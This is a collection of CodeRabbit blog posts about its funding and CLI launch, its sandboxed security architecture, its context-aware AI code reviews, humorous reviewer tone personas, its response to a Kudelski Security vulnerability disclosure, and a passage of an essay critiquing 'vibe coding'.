![](https://victorious-bubble-f69a016683.media.strapiapp.com/39bb2d6f55433133bd55778149b9c784e6ab3e66d621325ad4f8f124b7acbe74_f3cf58fae5.png) ## How we’re celebrating: By announcing CodeRabbit CLI %[https://youtu.be/IqBKf4u5MtA] Today, we're celebrating our Series B by announcing CodeRabbit CLI, AI code reviews that live in your terminal and orchestrate seamlessly with Claude Code, Codex CLI, Cursor CLI, Gemini, and other AI coding agents. As developers increasingly write code through CLI Coding agents, we've identified a critical gap: code is being generated at unprecedented speeds, but quality validation happens too late, often only at the PR stage. CodeRabbit CLI changes this by bringing intelligent review directly into the CLI workflow, creating a real-time feedback loop between code generation and validation. Now, whether you're prompting Claude Code to refactor a module or using Cursor CLI to implement a feature, CodeRabbit instantly reviews the output, catches hallucinations, flags security issues, and even hands contextualized fixes back to your AI agent. CodeRabbit CLI is the missing orchestration layer that makes AI-generated code production-ready, turning the promise of autonomous development into reality. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ec1e9a28cd02a1d4ca1089257ab607ac34b02fc9ca7682d316cec349674ba92e_3b099f7b0a.png) ## **What this funding means for us (and for you)** Our Series B round will help us keep pace with the scale of the problem we set out to solve. Here’s where we’re putting that investment: * **Accelerating product development:** Our roadmap is packed. From deeper context integrations to smarter pre-merge checks and automated testing, we’re focused on making reviews faster, more accurate, and more useful for every team. * **Supporting open source:** Today, more than 100,000 OSS projects already use CodeRabbit. With this funding, we’re doubling down on contributions and support to strengthen the community that made modern development possible. More on that later in the week! * **Hiring the best talent:** We’ve already doubled headcount this year and we’re hiring globally across engineering, product, sales, marketing, and customer success. This funding gives us the space to keep building what we believe is the most important missing piece of AI-powered development: scalable, context-aware reviews. ## **Thank you for all your support** When we started this company, we knew we were chasing a problem every engineer experiences: reviews are a pain and they don’t scale easily. The fact that CodeRabbit is now helping thousands of teams tackle that problem is both humbling and energizing. To our customers, community, and investors: thank you for believing in us and building alongside us. And if this work excites you, consider joining us. Come help us build the future of code reviews. [***Try CodeRabbit for free***](https://coderabbit.link/KWGzOUS) ***yourself and learn more about our*** [***open roles.***](https://coderabbit.link/OG1OZk3)

Our security posture: How we safeguard your repositories

Harjot Gill — Sun, 14 Sep 2025 00:00:00 GMT

Our customers trust us with their most valuable asset: their source code. That trust is why security is central to our mission of helping developers ship better code faster. When there’s a chance to strengthen our security posture, we act quickly and decisively. And when we design new systems, we design them with “security by default” in mind. We share below the architecture that makes CodeRabbit more resilient, limits the potential impact of any one component, and ensures that the data entrusted to us remains safe under all circumstances. ## Overview Customers install CodeRabbit on their git platforms via the app marketplace. We integrate via webhooks with all popular Git providers such as GitHub, GitLab, Bitbucket & and Azure DevOps. The integration allows us to register webhooks on events such as PR opened, user comment, etc. Each event is processed in complete isolation. We maintain a secure internal queue that verifies subscriptions, applies rate limits, and ensures that only authorized events are allowed through. Events are handled one at a time, with zero shared state and no assumptions about what came before or after. This model gives us something incredibly valuable: containment by default. If an attacker were to compromise one event, they would find nothing else to pivot to – no shared memory, no long-lived tokens, no context beyond that single, short-lived process. Every review starts from scratch, runs alone, and ends clean. ### **Our architecture at a glance** Here’s a high-level look at how our system is structured in our git-based, IDE, and CLI reviews: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0260fd092a77c874c57979d28f94e35fbb2d137e30ea8efa3a35c87389d58b19_02714c0a84.png) This design is focused on limiting an attacker’s potential “blast radius” – or how much damage an attacker can do if they succeed at breaching one component. By isolating secrets, tightly scoping tokens, and strengthening our encryption, we’ve drastically reduced that radius. ### Our layered approach We use these layered strategies: ### 1\. Sandbox We create a secure sandbox environment for each code review event to clone the codebase in order to read files, pull context from various sources in our knowledge base about your code and to run tools, linters, web search queries & verification checks. Our sandboxed environment only has the short-lived token for that particular repository, but it contains absolutely no other secrets, API keys, or credentials. Even if an attacker were to achieve remote code execution within our sandbox environment or get out of the sandbox and break the sandbox kernel-based isolation mechanism, they would find nothing of value - no environment variables with tokens, no configuration files with secrets. Internal network access is also blocked from the sandbox. Tools may connect to the internet when required, but they cannot reach CodeRabbit’s internal services. ### 2\. Token Service Separation To reinforce the isolation of workloads, we have fully embraced a model based on short-lived session tokens rather than long-lived secrets. Instead of passing environment variables or static credentials, every process is scoped with query or event-specific tokens. These git provider tokens are valid only for the duration of the event or process. These are customer-specific, short-lived tokens. These tokens also have strict rate limiting and audit logging. This means that workloads never carry unnecessary privileges. They can only access the resources required to process a specific pull request – and nothing more. By removing persistent credentials from execution environments, we eliminate one of the most common attack surfaces. Even if a third-party tool were exploited, the attacker would see nothing beyond the minimal context of the current event. ### 3\. Customer Data Isolation & Encryption Each customer's code review is completely isolated. We provision separate containers per code review and use customer-scoped tokens that can only access their specific repositories. There is no shared state between customers. We also ensure that our code index and all cached code is encrypted with a unique key per customer. Even CodeRabbit employees can't see any code-related data we store. You can also [opt out of these features](https://docs.coderabbit.ai/reference/caching) if you don’t want a cached copy of your code. This layered approach ensures that even if an attacker were able to gain access, they would be unable to access anything critical. ## **Our broader security posture** A security best practice is to layer multiple controls so that if one fails, others remain in place. We’ve implemented several layers of defense to protect customer code and data: **Automated sandbox enforcement**: Every external tool must run in an isolated sandbox environment. This rule is enforced automatically. * **Hardened deployment gates**: We’ve added pre-deployment checks that verify no service can bypass sandbox isolation or attempt to run with escalated privileges. * **Encryption by customer key**: Code indexes and cached code are encrypted with a per-customer key. This ensures that even if cache data were exposed, it would remain unreadable without the correct key. * **Auditing and monitoring**: We’ve expanded our monitoring of sandboxed environments and added automated alerts for unexpected behavior or network activity. * **Expanded training**: Every CodeRabbit engineer receives additional security training focused on secure-by-design practices and safe handling of secrets. * **Least privilege access:** Users, processes, and systems are granted only the minimum level of permissions and access rights necessary to perform their specific tasks and nothing more. * **Vulnerability disclosure program (VDP):** We maintain a formal program that invites independent security researchers to report potential issues responsibly. This ensures that if a weakness is discovered, it can be addressed quickly, transparently, and in partnership with the security community. * **Penetration testing and architectural reviews:** We work with multiple third parties to conduct routine penetration testing and architectural reviews to routinely audit and improve our security posture. ## **Looking ahead** We’re committed to building on this foundation by continuing to work with independent auditors, engaging with security researchers through responsible disclosure, and refining our internal practices. Our goal is to deliver world-class AI code reviews with the highest levels of security and reliability.

How CodeRabbit delivers accurate AI code reviews on massive codebases

Sahana Vijaya Prasad — Fri, 05 Sep 2025 00:00:00 GMT

Massive codebases are a special kind of beast. They sprawl across hundreds of files, evolve over years of commits, and occasionally feel like they’re held together by equal parts duct tape and institutional memory. Reviewing changes in that environment isn’t just hard – it feels like an archaeological dig. Did this line move here last week for a reason? Is there another file quietly depending on it? That’s exactly where CodeRabbit shines. It was built for scale, so instead of drowning you in disconnected file-by-file comments, it reviews with the whole history and architecture of your massive codebase in mind. The larger and older your repository, the more useful CodeRabbit becomes because it can see the patterns, dependencies, and rules that humans usually forget about halfway through a pull request when trying to keep all the dependencies in that legacy code in their head. ## Large codebase? AI code reviews need more context! ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d12fc2120fd111638fe0a490353009d865c68fa3b491f3f432469ec23fe750bc_5f05aa4829.png) CodeRabbit is [known for performing great on large repos](https://x.com/qwertyu_alex/status/1956848505445654595). Our tool doesn’t just skim your pull requests; it goes full archivist. Before leaving a single comment, it gathers the surrounding code from your large codebase and pulls in dozens of points of context from your code. AI agents then trace how those pieces have moved through history, apply your team’s coding standards, and even double-check their own reasoning with scripts and tools. The effect is reviews that feel unusually…informed about your legacy codebase. It catches cross-file issues before they turn into production mysteries, enforces consistency without nitpicking, and scales comfortably across sprawling repos with long, complicated pasts. The power you gain through this is clearer, earlier feedback on real risks, fewer “wait, what else did that touch?” surprises, and reviews that actually reflect how your whole massive codebase fits together. ## **The problem with diff-only reviews (or what goes wrong without context)** Code diffs are necessary, but they’re not sufficient. In a massive codebase, a 10-line change can quietly alter a shared helper used by multiple services, shift a public API contract, or undermine a security assumption that lives outside the files in the diff. AI Bot reviewers who only see the diff are flying without instruments within a large codebase. AI that can’t see where the changed code is referenced, what else tends to change with it, or whether the change actually matches the ticket’s intent, might work for a smaller codebase but not for yours. Without the right context, you get ping-pong cycles (“Can you also update…?”), late surprises at merge time, and a steady drip of small regressions that add up. The review looks fine on paper, while production tells a different story. ## **Building the right context on your legacy codebase (and how that helps your PRs)** Think of CodeRabbit as assembling a case file before giving an opinion. Here’s what goes into that case file and how each piece shows up in your reviews. 1. ### **A map of your code (Codegraph)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/9072170ca9cb2efb307be5a2925b5e29e8afd8a04877d974e9b136465ec6d759_1086492c7f.png) CodeRabbit builds a lightweight map of definitions and references and scans commit history for files that frequently change together throughout your massive codebase. This creates a map of file dependencies that CodeRabbit uses to check if any changes in your PR will break other dependencies in your codebase. **Why this helps:** The review can reason across files, not just lines. **Seeing it in action:** CodeRabbit posts a summary listing bugs **outside the diff range** that CodeRabbit located by traversing related files with Codegraph. **Here’s an example of the files that CodeGraph brings in from across a repository when completing a PR review.** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/47a382e99b301be1cb40e2b5550eca4045b09e0c899894e1fd0501dd4d156f59_4f806a353c.png) 2. ### **Code Index (semantic & similarity retrieval)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d67b8f81bfe6c3288f37c417d0798143eea41d0ca380c9ce64bd8f390ea4c134_defd674baf.png) CodeRabbit maintains a semantic index (embeddings) of functions, classes/modules, tests, and prior PRs/changes. During review, it searches by purpose, not just keywords to surface parallel implementations to align with, pull relevant tests to reuse or extend, and recall how similar issues were fixed before. **Why this helps:** Suggestions are grounded in how your legacy codebase already solves similar problems, reducing rework, improving consistency, and speeding up test coverage. **Seeing it in action:** Using similarity retrieval, CodeRabbit surfaces a different test with the same callback pattern and proposes the same fix. 3. ### **Your team rules, not generic advice** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/cabd984a15b158fa8ef8ea5af06da42b47bb9c0707f7235c9644b3f61faacff1_b6852c6a46.png) CodeRabbit reviews are primed with your standards (naming, error handling, API boundaries, security requirements, performance expectations, testing norms) that you can share with us via coding guidelines and review instructions. **Why this helps:** Feedback reflects *your* standards and context, not a one-size-fits-all checklist. **Seeing it in action:** CodeRabbit flags a missing Prisma migration after a schema edit. A developer replies that migrations are auto-generated during deploy, a repo-specific rule. CodeRabbit stores that as a **Learning** to avoid future false positives. 4. ### **Signals from tools** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e695d8378dcf54acb73e8147bec60a8788c96e9c66dde90ab35ea63d8dabcccf_00bac096d6.png) Alongside AI reasoning, CodeRabbit runs linters and security analyzers and folds their findings into our easy-to-read and understand reviews. **Why this helps:** You get grounded, actionable suggestions backed by both AI *and* recognizable tools. **Seeing it in action:** CodeRabbit will do things like point to the exact ESLint rule and line numbers, rewrites the callback as a typed declaration, and guards the call with optional chaining. 5. ### **Evidence, not vibes (verification scripts)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f26ade331178afbb9b50edd348d412a8dcb55874cc0ae23182903bef0d89b0ce_dfe43117c7.png) When something needs checking, CodeRabbit generates shell/Python checks (think grep, ast-grep) to confirm an assumption or extract proof from the codebase before we post the comment. **Why this helps:** Comments come with ***receipts***. That translates into less noise and more comments that actually improve your code. **Seeing it in action:** The comment pinpoints the file and loop, explains the failure mode, and proposes the exact change produced by the verification agent after analyzing the parsing path. This is **context engineering in practice**: gathering, filtering, and organizing the *right* information before asking the model to judge. It’s been core to CodeRabbit since day one. The payoff is simple: higher signal, lower noise, and reviews that feel like they understand your system. ## **Scaling to enterprise-size repos** CodeRabbit has an advantage on massive codebases and legacy codebases because we designed our pipeline with scale in mind. When a PR arrives, CodeRabbit spins up an isolated, secure, short-lived environment to do the work. It pulls only what it needs, constructs the context, runs the checks, and tears everything down after. During busy hours, many of these workers run in parallel so review speed holds steady. You stay in control of scope by using path filters to keep bulky or generated assets out of the way, and choosing whether to enable caching or indexing to accelerate repeat reviews. In short: selective scope keeps context focused, isolation keeps it safe, and elastic execution keeps it fast. This approach scales with your codebase and your release calendar. ## **CodeRabbit: Large codebase AI code reviews done right** CodeRabbit’s advantage on massive codebases isn’t a single trick. It comes from how we approach context engineering end-to-end: map what the change touches, tie it to intent, apply your rules, verify with tools, then comment with evidence. We’ve operated this way from the start, well before “context engineering” became a buzzword, because it’s the only reliable path to accurate, low-noise reviews at scale. ***Ready to see a deep-context review on your large codebase? →*** [***Start a 14-day trial***](https://coderabbit.link/sY5vXpT)

We asked CodeRabbit to talk to us like your disappointed mom & it did!

Manpreet Kaur — Thu, 28 Aug 2025 00:00:00 GMT

Have you ***truly*** lived before an AI reviewer has told you, “I ran this locally and my laptop filed for workers’ comp?” We doubt it. Welcome to CodeRabbit’s Tone Customization, a feature we added because we know exactly what developers want most: to be roasted by AI. After all, what’s even the point of having robots review your code, if they’re not going to point out your inadequacies with withering one-liners?? The best part is that we left our Tone Customization completely open-ended. That means that you can get your reviews in the tone of an **angry Stack Overflow commenter,** **a burnt-out senior dev**, or even a **film noir detective** (“This code smells funny. Too funny. Like a JavaScript closure that wasn’t supposed to be there”). You could also just have our reviewer be kind to you if you’re into that sort of thing. Tone Customization is one of our favorite features. Why? Because reviewing code can be tedious but surprising your co-workers with a new funny tone keeps everyone entertained. Anyways, we created some sample personas for you below as examples of what you can do with Tone Customizations. These are meant solely as inspiration. We fully expect you to take this in hilarious directions we could never have thought of. Please, for the love of all things holy, share screenshots on socials and tag us when you do. We like to laugh, too. ## Tone Customization setup instructions ![](https://victorious-bubble-f69a016683.media.strapiapp.com/027dda5fc6926eab4f0edf93a938432ed19b4fb8ba493479fcfbd4896119729f_dfe915dfab.png) First things first, you need to set up your custom tone. We cover that in [our Docs under Tone Instructions.](https://docs.coderabbit.ai/reference/configuration#tone-instructions%EF%BF%BC%EF%BF%BCAfter) **Field:** tone\_instructions — *string* — **Default:** empty (uses standard tone) **Web UI:** Settings → **General** → **Tone Instructions** → enter text → Save. %[https://youtu.be/53cyq58zNRg] Then you can add a natural language prompt to the Tone Instruction field, asking CodeRabbit to review your code in any way you want. You might try some of the following prompts: * Deliver all review comments in the style of a **televised nature documentary,** perhaps with David Attenborough hosting. Every observation should sound like a hushed, awe-filled commentary on a rare creature in the wild. * Deliver all review comments in the style of a **Silicon Valley hypebeast founder.** Every observation should sound like a pitch to investors, full of buzzwords, exaggeration, and tech-bro energy. Sprinkle in phrases like “crushing it,” “10x,” “game-changer,” and “unicorn potential.” * Deliver all review comments in the style of a **Scrum Master who’s had way too much coffee.** Every note should be upbeat, hyperactive, and peppered with Agile jargon like “sprint velocity,” “burn-down,” “story points,” and “quick win.” ## A few (wild) examples of Tone Customization **Let’s see CodeRabbit in action with a few examples in the voice of:** * Mr. T * Yoda * Your disappointed mother * The senior dev who thinks you’re an embarrassment * Your clingy ex * A Grand Theft Auto character ### First up, reviews by Mr. T Mr. T isn’t a fan of hardcoded URLs. He’ll tell you your “Hardcoded [localhost](http://localhost) [URL ain’t](http://localhost) gonna fly in production, sucka!” and that you’ve got it “hardcoded tighter than my gold chains!” before telling you to “Make that URL configurable like a true champion.” He even gives you the exact code to fix it, so you can stop being a “fool.” ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c499cb647fe96cde290948448235b7920f08b89726ddeb0bef9b650e59baf450_cb23501a46.png) **More examples:** * “I pity the fool who calls this a function! This ain’t no function, it’s a malfunction!” * “Your variables are so weak, they need a protein shake just to compile.” * “Ain’t no linter in the world tough enough to clean up this mess.” * “I pity the fool who thinks copy-paste is a design pattern!” ### Next: Reviews by Yoda He’s a master of terse, yet impactful, critiques. When faced with a subtle race condition and hard-coded dependencies, he’ll give you a refactor suggestion with his classic wisdom: “Effect broken it is: hard-coded room, wrong deps, missing guards. Fix, we must.” He then provides a detailed fix that addresses the issue, guards against errors, and correctly handles dependencies. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/15834b4fb96c64a13af3dd0b9c2b78b105d7d742777cedc5b84c3eb1885a691e_3638e2e596.png) **More examples:** * “Readable, this code is not. Fix it, you must.” * “Bug, this is. Feature, it is not.” * “The dark side of tech debt, I sense in this commit.” * “Null your variable is. Crash your program will.” ### Reviews by “the senior dev who thinks you’re an embarrassment” ![](https://victorious-bubble-f69a016683.media.strapiapp.com/592955e6bfac9c428210143fca74e792ddfde60eb57f1d22e5001ecf367104d6_3a75e1188c.png) This tone doesn’t pull punches. When CodeRabbit sees a “fake DB” that’s only checking for the most basic SQL injection pattern, the Senior Dev persona will bluntly state, “This ‘fake DB’ is a masterpiece of incompetence.” It then explains the problem in no uncertain terms and provides a proper fix that’s more robust and secure. **More examples:** * “If ignorance were a design pattern, you’d be its chief architect.” * “This PR lowered my career expectancy by at least five years.” * “I’d say ‘good effort,’ but even that would be a lie.” * “This isn’t technical debt. It’s a foreclosure.” ### **Reviews by your disappointed mom** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2e3e0cdbe6c2cf844b53cdb9efa32b3a40ac725023d7bb25deb8ff885ee2cf67_893e89a7ab.png) When a jwtSecret is hardcoded directly into the code, this persona responds with: “I’m really disappointed to see a live Stripe secret embedded in the shipped bundle, it’s like packing candy in a lunchbox meant for broccoli.” The tone mixes disappointment with direct action, providing a clear list of “Actions required” to fix the critical security leak. **More examples:** * “I raised you better than to name a variable x.” * “I’m not mad… I’m just disappointed this doesn’t even compile.” * “Other developers’ code runs just fine. Why can’t yours?” * “I didn’t spend nine months carrying you so you could write nested ternaries.” ### Reviews by your clingy ex ![](https://victorious-bubble-f69a016683.media.strapiapp.com/550bfb87f7d377618cb7c5b8f4cf27ac28a54f53fd462931b7f776b43390af80_139834c501.png) When you forget to export variables like db, sessions, or fakeAsyncDanger, the Clingy Ex doesn’t just point it out; they make it personal. They’ll sigh and say, “Oh, so we’re just defining things and not telling me about them now? You think you can just keep your db all to yourself? You think I won’t notice sessions just sitting there, ignored? We used to share everything…” Then, with a passive-aggressive flourish, they’ll remind you of the “good times” when modules communicated openly and they’ll drop the code you should be using. **More examples:** * “I thought we agreed no more global variables… guess promises don’t mean anything to you.” * “This function goes in circles. Just like all our conversations.” * “Why do you always run away from exceptions… like you ran away from commitment?” * “Every bug you push feels like another knife in my back.” ### Reviews by a Grand Theft Auto character In this example, when useState is called at the top level, this GTA character immediately flags it as a violation of the Rules of Hooks & says it “Will blow up a runtime.” It then provides a clear diff to remove the invalid hook & suggests moving the state inside the component if needed. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/842dc3524f2d7685fb3cb4bdfb4a73f24ac4da6c8e3a6f99f24768b1b4986103_04efcabaf5.png) **More examples:** * “Your error handling just pulled a hit-and-run.” * “This logic crashes harder than me driving down Vinewood Hills at 3 AM.” * “Congrats, you just committed grand theft readability.” * “Your function naming scheme is like my rap sheet: way too long and full of mistakes.” ### **The roasting reviewer (our favorite!)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d5825ca5230d7879861eb197a8d18a811d61b32c808e7230af41086fb8be4f4f_3fad3c157f.png) Let’s be real, some days, you want your AI code reviewer to hurt your feelings a little. We got you. But be warned: our reviewer goes hard. So, make sure you’re up for it. **More examples:** * “I’ve seen toddlers with crayons design better architecture.” * You’ve weaponized incompetence into a coding style.” * “Your code’s only consistent trait is disappointment.” * “I’d ask you what you were thinking, but clearly no thinking happened here.” ## Why teams are using this – for real Most devs have this experience: You open a PR and bam! The reviewer leaves dry, lifeless comments. You skim. You sigh. You move on. Bugs live—the codebase decays. Motivation dies. CodeRabbit flips the script. You give it a tone, any tone, and now you’ve got a code reviewer that isn’t lifeless. This makes the review process feel more engaging, fun, and sometimes even supportive (once again, if you like that sort of thing). It’s not just for laughs (though those are guaranteed). Teams are using tone customization to: * Create mentorship-style reviewers for juniors * Build team inside jokes through personas * Make boring reviews ***actually*** fun for a change * Customize tones for different comment types (Ex, serious on security, silly on style) * Help the whole team engage in the review process by making feedback more accessible & inclusive * Get owned by AI (yes, we’ve already said this but we all know this is the core use case of this feature) ## Your turn: Surprise us with your most absurd customized tones! ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0c4c7c8039b7de7c57d350a45fef11c75da08194bfc96a1daaddf7afa5b794fd_2601987b5a.png) Got a wild reviewer persona in mind? Drop it into CodeRabbit. Get screenshots (this part is important) and then share them with us on social media. We’ll give you free swag if you do. Sharing your personas can be helpful to others looking for inspiration. Also, like we said earlier, we like to laugh. Please provide us with a steady stream of funny screenshots. We will die if you don’t (on the inside). **Want to try tone customizations?** [**Get started with CodeRabbit today!**](https://coderabbit.link/qhID6X4)

Our response to the January 2025 Kudelski Security vulnerability disclosure: Action & continuous improvement

Harjot Gill — Tue, 19 Aug 2025 00:00:00 GMT

## No customer data was accessed and the vulnerability was quickly remediated within hours of disclosure As the CEO, I want to address recent reports of a security vulnerability discovered in January 2025 by Kudelski Security researchers and share our immediate response, the steps we've taken since, and our ongoing commitment to security. ## **What happened** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/6aec2e393a199ea1b090a34532927705988be3a3a1abfdeaadbac19bcb972197_a0e9dee552.png) On **January 24, 2025,** security researchers from Kudelski Security disclosed a vulnerability to us through our Vulnerability Disclosure Program (VDP). The researchers identified that Rubocop, one of our tools, was running outside our secure sandbox environment — a configuration that deviated from our standard security protocols. We immediately initiated an investigation and were able to remediate this issue within hours through our rapid incident response protocol. We confirmed the issue disclosed by Kudelski Security, confirmed that there was no evidence of any other unauthorized access, identified the root cause, implemented a fix, and, as described below, we enhanced our comprehensive security protocols to prevent similar incidents. To be clear: **We use secure sandboxes as standard practice across our infrastructure.** This was an oversight on our part and we take full responsibility for it. ## **Our immediate response** Upon receiving the disclosure, our security team activated our incident response protocol: * **Within 1 hour**: We confirmed the vulnerability and began immediate remediation by first disabling Rubocop until we could fix the vulnerability. * **Within 3 hours**: We completed a full rotation of all relevant credentials and secrets. * **Within 12 hours**: We deployed a comprehensive fix to production, relocating Rubocop into our secure sandbox environment. * **Additionally, we**: * Conducted a thorough audit of all systems to ensure no other services were running outside our sandbox infrastructure. * Automated sandbox enforcement. * Introduced enhanced deployment gates. * Audited and updated our mandatory security training for all engineers. **We promptly investigated to identify any potential unauthorized access. The investigation identified no evidence that any customer data was accessed or that any malicious activity occurred.** ## **Why this matters to us** Security isn't just a checkbox for us; it's fundamental to our mission. While our services run within secure sandboxes as designed, in this case, the investigation determined that Rubocop had been deployed outside this security boundary. This deviation from our standards, while contained quickly and without customer impact, is unacceptable to us. We took action immediately to ensure it wouldn’t happen again. **What we're doing differently** 1. **Comprehensive sandbox audit**: We immediately completed a full review of ALL services to ensure 100% compliance with our sandbox requirements. Rubocop was the only service found outside our sandbox environment and this has been rectified. 2. **Automated sandbox enforcement**: We immediately implemented automated checks that have since prevented any service from deploying outside our security boundaries. 3. **Enhanced deployment gates**: Every deployment now requires supplemental explicit sandbox verification before reaching production. 4. **Updated trainings:** We also audited and updated our mandatory security training for all engineers. ## **Our VDP program: Security through collaboration** This vulnerability disclosure exemplifies why we've invested heavily in building a Vulnerability Disclosure Program. It features: * **Active researcher engagement**: We maintain ongoing relationships with multiple security researchers worldwide. * **Competitive rewards**: Top-tier bounties that recognize the value of security research. * **Fast response times**: Average first response under 24 hours, resolution within 7 days. * **Clear communication**: Dedicated security team providing regular updates throughout the disclosure process. ## **The value of responsible disclosure** Kudelski Security's professional approach allowed us to address this vulnerability before it could be exploited maliciously. This is exactly how the security ecosystem should work — researchers and companies collaborating to improve security for everyone. We're grateful for their professionalism and encourage all security researchers to engage with us through our VDP program at [https://vdp.coderabbit.ai/](https://vdp.coderabbit.ai/). Whether you're an independent researcher or part of an established firm, we value your contributions to our security. ## **Our commitment** To our users, we will continue to: * Maintain secure sandboxes as our default security boundary for all services * Invest heavily in security infrastructure and tooling * Run one of the industry's most comprehensive VDP programs * Actively engage and reward security researchers * Learn from every vulnerability disclosure and incident, no matter how small * Hold ourselves to the highest security standards * Maintain compliance with industry security standards like SOC 2, type 2 We're grateful to Kudelski Security for their research and committed to our users who trust us with their data. We welcome any questions or concerns at [security@coderabbit.ai](mailto:security@coderabbit.ai) or through our VDP portal at [https://vdp.coderabbit.ai/](https://vdp.coderabbit.ai/).

Vibe coding: Because who doesn’t love surprise technical debt!?

Ankur Tyagi — Thu, 14 Aug 2025 00:00:00 GMT

AI-assisted coding tools like Claude Code, ChatGPT, and GitHub Copilot are a godsend. I use them every day — for boilerplate, bug fixes, fast explorations, even documentation. I'm all in on AI as a productivity booster and creative accelerator. But they’re causing a shift in how we write software — and it’s not all good. That’s because we’ve reached the stage of AI adoption where some of us are **vibe coding at work**. And that might be heralding a development culture where intentional design gets thrown out in favor of convenience and speed. ## **What is vibe coding?** ![what is vibe coding?](https://victorious-bubble-f69a016683.media.strapiapp.com/75c4c3731ab8ae060261b02218fc154962be109c8248861fcc17c732a60e6d70_a47b8be4db.png) Vibe coding started as a way to quickly stand up prototypes or hobby projects. You prompt the model, get it to throw together a whole app or feature for you without much input – and voila! You can test your concept in minutes. It’s perfect for beginner developers, solo entrepreneurs, and experienced devs creating quick demos. Fail fast, as they say. But while those are great use cases for vibe coding, vibe coding has evolved into a method of working with AI agents to generate code for all sorts of use cases – including for production systems. It involves prompting AI to write code without much manual input or understanding of the code being generated. It often involves vague instructions, minimal verification, and blind trust in the output. It appeals to the vibe coder because it's fast, effortless, and doesn’t require you to understand the underlying language or system architecture. But when you prompt an AI to generate code without a strong mental model of what you’re building. It’s vibes-first, architecture-maybe, test-later (if ever). Think: “Build me a REST API with Stripe integration and a PostgreSQL backend.” It’s fast, seductive, and usually "just works." But underneath the surface, that app you vibe coded often hides brittle assumptions, unclear logic, and unstructured sprawl. ## **The vibe coder dilemma: Vibes don’t scale** At its core, software engineering is about much more than working code. It’s about problem-solving, designing maintainable architecture, writing clean and expressive logic, debugging with precision, and ensuring long-term reliability. Because, sure, you got that vibe coded microservice running – but how’s the error handling? Does it follow your org’s conventions? Did the AI invent a data model with weird naming inconsistencies? Are there ten different styles of writing the same thing across files? Is your production database still alive? When you vibe code, you skip over the intentional design steps that make code maintainable — and scalable — in the long run like naming variables with intent, choosing clean structures, and designing thoughtful flows. When vibe coding becomes the norm, we risk sidelining the deeper thinking that makes engineers effective and systems resilient. You're speedrunning toward a tech debt pileup with no map and no brakes. ## **AI is the new abstraction (and it’s heavily non-deterministic)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2acc2e4c3fe9492ecf0993aa5af7d6d79604fd25d23e020c10e287087363febf_f7e02abbd5.png) Modern programming languages already abstract away hardware and memory management. AI adds a probabilistic, non-deterministic layer that obscures logic even further. With AI, we’re abstracting **intent**. But here's the catch: AI outputs are **probabilistic**. That means: * The same prompt can yield wildly different results on different runs. * Slight tweaks in phrasing can produce totally different architecture choices. You often don’t know *why* the model chose what it did. This vibe coded fuzziness is fine for prototyping, but for production systems? The unpredictability weakens trust, control, and reliability – qualities critical to scalable software development. It’s like letting a chaotic neutral wizard refactor your codebase. ## **Technical debt at the speed of (vibey) prompts** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a7c48c79e5eb9aaec7deae7a618d3e05dfc00816548676b9ab949a656f66d3b9_89e1f75e15.png) Let’s be honest: vibe coding feels amazing at first. You get a working prototype in an hour instead of a week. But without the right guardrails, that speed can lead to: * Silent bugs * Duplicate logic * Incoherent architecture * Inconsistent patterns * Unreviewed PRs * Zero test coverage * Hidden complexity Without understanding the structure, future maintenance becomes painful. Reviewing takes exponentially longer and you’re more likely to miss things. Debugging becomes detective work. Scaling becomes guesswork. The time you save upfront can cost much more later. And that’s not even addressing the PR backlog you’re creating. Suddenly, you're in a codebase that *works* but can't be touched without summoning six hours of debugging, a million tokens-long context window, and three therapy sessions. ## **Vibe coding: The fragility multiplier** Vibe coded systems tend to: * Break under edge cases. * Confuse the next dev (or even future-you). * Fail silently in production. The result? You spend **more** time reviewing, fixing, explaining, and rewriting things than you saved by prompting it in the first place. You've created a system that's not just fragile — it's fragile *and* mystifying. ## **Testing, security & all the stuff AI doesn’t do by default** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/6a96b6142a4d6b37c24f1cf24b961c788a7df35d33f461fa6ac5030287df2361_cccf1a39e2.png) AI won’t warn you if it accidentally vibe codes sensitive data, hardcodes an API key, or skips input validation. It won’t enforce domain-driven design or test coverage unless you ask it to, perfectly. Without strong engineering intuition, vibe coding can lead to real-world vulnerabilities and brittle systems, especially when security is an afterthought instead of a default. We’ve seen this with the [Tea Dating app](https://x.com/rauchg/status/1949197451900158444) leaking the private information of over 70,000 customers and AI deleting the [SaaStr’s production database.](https://www.theregister.com/2025/07/21/replit_saastr_vibe_coding_incident/) AI doesn’t: * Write unit tests unless you explicitly ask. * Understand your threat model. * Follow OWASP guidelines. * Validate user input unless prompted perfectly. * Log responsibly (hello, hardcoded secrets and PII leaks). If you don’t have strong engineering habits already or if you’re not willing to stick to your current habits even in this vibey era, you’ll never know these things are missing until they bite you — hard — in prod. ## **When vibes replace struggle, you lose the intuition** Struggling with bugs, tracing stack traces, and learning from mistakes builds technical intuition. That frustration is part of the learning path and skipping it can lead to shallow confidence and dependency. Without struggle, developers don’t build the muscle to solve unfamiliar problems independently, and that’s where true expertise lies. Yes, debugging sucks. But tracing a nasty bug through 12 layers of abstraction teaches you something an LLM never will. The struggle builds: * Mental models of systems * Pattern recognition * The instinct to smell code rot before it crashes When you skip that, you build shallow confidence on top of shallow understanding. And when things go sideways, you won't have the tools to fix it. ## **Where vibe coding *does* shine** Let’s give credit where it’s due. Vibe coding is awesome for: * Rapid prototyping * Generating boilerplate or repetitive tasks * Teaching programming concepts in an interactive way * Communicating product ideas through rough mockups * Brainstorming with frameworks or patterns Used with awareness, it becomes a helpful tool to the vibe coder. Used blindly, it becomes a liability. We need to understand as devs and teams where to draw the line. And when to bring in support in the form of more rigorous code reviews and unit tests to 